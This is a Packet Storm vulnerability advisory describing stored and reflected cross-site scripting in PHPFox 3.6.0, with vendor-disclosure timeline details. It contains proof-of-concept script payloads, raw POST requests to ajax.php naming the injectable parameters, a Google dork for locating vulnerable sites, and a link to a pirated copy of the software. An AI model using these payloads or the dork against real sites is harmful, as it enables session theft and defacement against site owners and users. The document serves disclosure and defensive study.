PHPFox 3.6.0 Cross Site Scripting

2013-10-14T00:00:00
ID PACKETSTORM:123593
Type packetstorm
Reporter BHG Security Center
Modified 2013-10-14T00:00:00

Description

                                        
                                            `------------------------------------------------------------  
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities  
------------------------------------------------------------  
Author: #BHG Security Center  
Date: Saturday, October 12, 2013  
Vendor: http://www.phpfox.com  
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip  
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.  
Tested Version: 3.6.0.Build.6  
Vulnerability Type: Cross-Site Scripting  
Google Dork: "Powered By PHPFox Version 3.6.0"‎  
Risk Level: High  
Saftware Price : 299 $  
Tested on: Windows, PHP 5.2  
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature  
-- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com  
  
  
------------------------------------------------------------  
== Proof of concept ==  
------------------------------------------------------------  
[-] Description :  
[-] PoC 1.1: Xss Code Injection Join Field :   
  
1) Xss Code : <script>alert(12)</script>   
2- Encode to : <script>alert(12)</script>  
3- Put in First name Sign Up  
4- After Login get your mouse on Recent Logins   
5- and you will see Xss Code was successful  
  
------------------------------------------------------------  
Vulnerable File(s):  
[+] ajax.php  
  
Vulnerable Parameter(s):  
[+] sId  
[+] sInput  
[+] title  
[+] type  
  
[-] PoC 2.2:  
## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script>  
  
## Request   
  
POST /upload/static/ajax.php HTTP/1.1  
=undefined&core[ajax]=true&core[call]=captcha.reload&core  
[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]  
=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]  
  
[-] PoC 3.3:  
## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad="  
  
## Request   
  
POST /upload/static/ajax.php HTTP/1.1  
core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74  
&feed_id=1&height=300&is_feed_view=1&sharemodule=event  
&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550  
  
------------------------------------------------------------  
Timeline:  
------------------------------------------------------------  
Advisory Publication: September 18, 2013 [without technical details]  
Vendor Notification: September 18, 2013  
Public Disclosure: October 12, 2013  
  
#BHG Security Center  
# Gr33tz:  
# Blackhat Group Members : 3H34N,,G3n3Rall,l4tr0d3ctism,NoL1m1t,b3hz4d  
# HUrr!c4nE,E2MA3N,solt6n,Dj.TiniVini  
`